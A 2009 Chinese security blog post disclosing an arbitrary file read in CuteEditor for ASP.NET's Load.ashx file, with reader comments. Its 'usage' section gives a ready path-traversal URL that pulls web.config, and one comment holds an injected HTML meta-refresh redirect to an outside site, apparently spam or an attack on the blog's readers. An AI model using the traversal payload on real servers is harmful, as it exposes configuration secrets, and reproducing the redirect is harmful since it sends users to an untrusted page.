首页 > 网络安全 > Cute Editor for ASP.NET vulnerability

Cute Editor for ASP.NET vulnerability

2009年5月22日 发表评论 阅读评论

####### by woyigui #######
#### www.woyigui.cn  ######

一、漏洞描述:
     CuteEditor for ASP.NET是建立在Html基础之上,最简单易用、功能最强大的所见即所得Asp.net在线编辑器。 CuteEditor可以帮助Asp.net开发者轻松的对原来文本框(Textarea)中的内容(包括文字、图片等Html内容)进行编辑,更重要得是这些内容编辑的实现是所见即所得方式。 CuteEditor还集成了文件(包括图片、文档等)上传、媒体(包括视频、声音等)文件直接插入等对你来说非常实用的功能模块。
   但是在 Load.ashx 文件中,未对 file 参数进行处理,可以加载任意文件。

二、官方地址:
      http://cutesoft.net/
      http://cuteeditor.51aspx.com/

三、利用方法:

    http://www.woyigui.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:Cute Editor for ASP.NET vulnerability
本文地址:http://www.woyigui.cn/2009/05/22/CuteEditor-vulnerability/

分类: 网络安全 标签:
  1. b0r3d
    2009年5月23日00:57 | #1
    回复 | 引用

    uplook哎呀,口气很有官方的感觉,文字很有专业黑X的感觉..
    这个这个是圈day吧

    [回复]

  2. 水兔
    2009年5月23日06:38 | #2
    回复 | 引用

    圈day

    [回复]

  3. purple's姿色
    2009年5月25日07:05 | #3
    回复 | 引用

    uplookgui哥把发家的day都扔出来了啊。

    [回复]

    woyigui 回复:
    五月 25th, 2009 at 上午 9:43

    没用。。

    [回复]

  4. aaa
    2009年5月30日21:51 | #4
    回复 | 引用

    <meta http-equiv="refresh" content="5;url=http://ulkucumilitan.webs.com/lperen0325index.html">

    [回复]

  1. 本文目前尚无任何 trackbacks 和 pingbacks.